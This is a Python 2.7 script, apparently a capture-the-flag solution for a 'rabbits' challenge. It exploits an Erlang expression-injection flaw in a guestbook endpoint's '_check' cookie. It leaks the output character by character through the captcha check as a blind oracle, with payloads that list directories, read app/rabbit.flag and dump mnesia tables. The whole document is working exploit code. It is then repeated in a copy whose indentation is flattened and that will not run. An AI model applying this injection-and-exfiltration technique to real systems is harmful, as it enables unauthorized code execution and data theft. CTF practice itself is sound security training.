annmuor/rabbits_solution.py

## rabbits_solution.py
#!/usr/bin/env python2.7
import requests
url = 'http://rabbits.qiwictf.ru/cgi-bin/guestbook.pl'
def check(f,maxlen=256):
    result = ""
    lastval = 0
    lastzval = 0
    counter = 0
    for i in range(1, maxlen):
        cookies = { '_check': '"lists:nth(%d,lists:flatten(io_lib:format([$~,$p],[%s])))"' % (i, f) }
        for c in range(1, 255):
            data = {'name': 'h4x0r', 'email': '111@1', 'message': '123', 'captcha': str(c)}
            r = requests.post(url, data=data, cookies=cookies, allow_redirects=False)
            if not r.headers['Location'].endswith('error=captcha'):
                lastzval = c
                break
        result += "%c" % (lastzval)
        if lastval == lastzval:
            counter += 1
        else:
            counter = 0
        lastval = lastzval
        if counter > 3:
            break
    r = len(result) - counter
    return result[:r]

funcs = [  'lists:nth(1,tuple_to_list(lists:unzip3(application:which_applications())))',
           'lists:nth(1,tuple_to_list(lists:unzip(rabbit:module_info(exports))))',
           'rabbit:get_eetaifeci0Eele0chaiwae3coo6ik0Ke_flag()',
           'file:get_cwd()','file:list_dir([$.])','file:list_dir([$a,$p,$p])',
           'file:read_file([$a,$p,$p,$/,$r,$a,$b,$b,$i,$t,$.,$f,$l,$a,$g])',
           'mnesia:dirty_all_keys(flags)',
           'mnesia:dirty_read(flags, [$^,$_,$_,$^])',
           'mnesia:dirty_read(flags, [$^,$^,$_,$^])']

# let's start
for f in funcs:
    x = check(f)
    print "%s = %s" % ( f, x )
	#!/usr/bin/env python2.7
	import requests
	url = 'http://rabbits.qiwictf.ru/cgi-bin/guestbook.pl'
	def check(f,maxlen=256):
	result = ""
	lastval = 0
	lastzval = 0
	counter = 0
	for i in range(1, maxlen):
	cookies = { '_check': '"lists:nth(%d,lists:flatten(io_lib:format([$~,$p],[%s])))"' % (i, f) }
	for c in range(1, 255):
	data = {'name': 'h4x0r', 'email': '111@1', 'message': '123', 'captcha': str(c)}
	r = requests.post(url, data=data, cookies=cookies, allow_redirects=False)
	if not r.headers['Location'].endswith('error=captcha'):
	lastzval = c
	break
	result += "%c" % (lastzval)
	if lastval == lastzval:
	counter += 1
	else:
	counter = 0
	lastval = lastzval
	if counter > 3:
	break
	r = len(result) - counter
	return result[:r]

	funcs = [ 'lists:nth(1,tuple_to_list(lists:unzip3(application:which_applications())))',
	'lists:nth(1,tuple_to_list(lists:unzip(rabbit:module_info(exports))))',
	'rabbit:get_eetaifeci0Eele0chaiwae3coo6ik0Ke_flag()',
	'file:get_cwd()','file:list_dir([$.])','file:list_dir([$a,$p,$p])',
	'file:read_file([$a,$p,$p,$/,$r,$a,$b,$b,$i,$t,$.,$f,$l,$a,$g])',
	'mnesia:dirty_all_keys(flags)',
	'mnesia:dirty_read(flags, [$^,$_,$_,$^])',
	'mnesia:dirty_read(flags, [$^,$^,$_,$^])']

	# let's start
	for f in funcs:
	x = check(f)
	print "%s = %s" % ( f, x )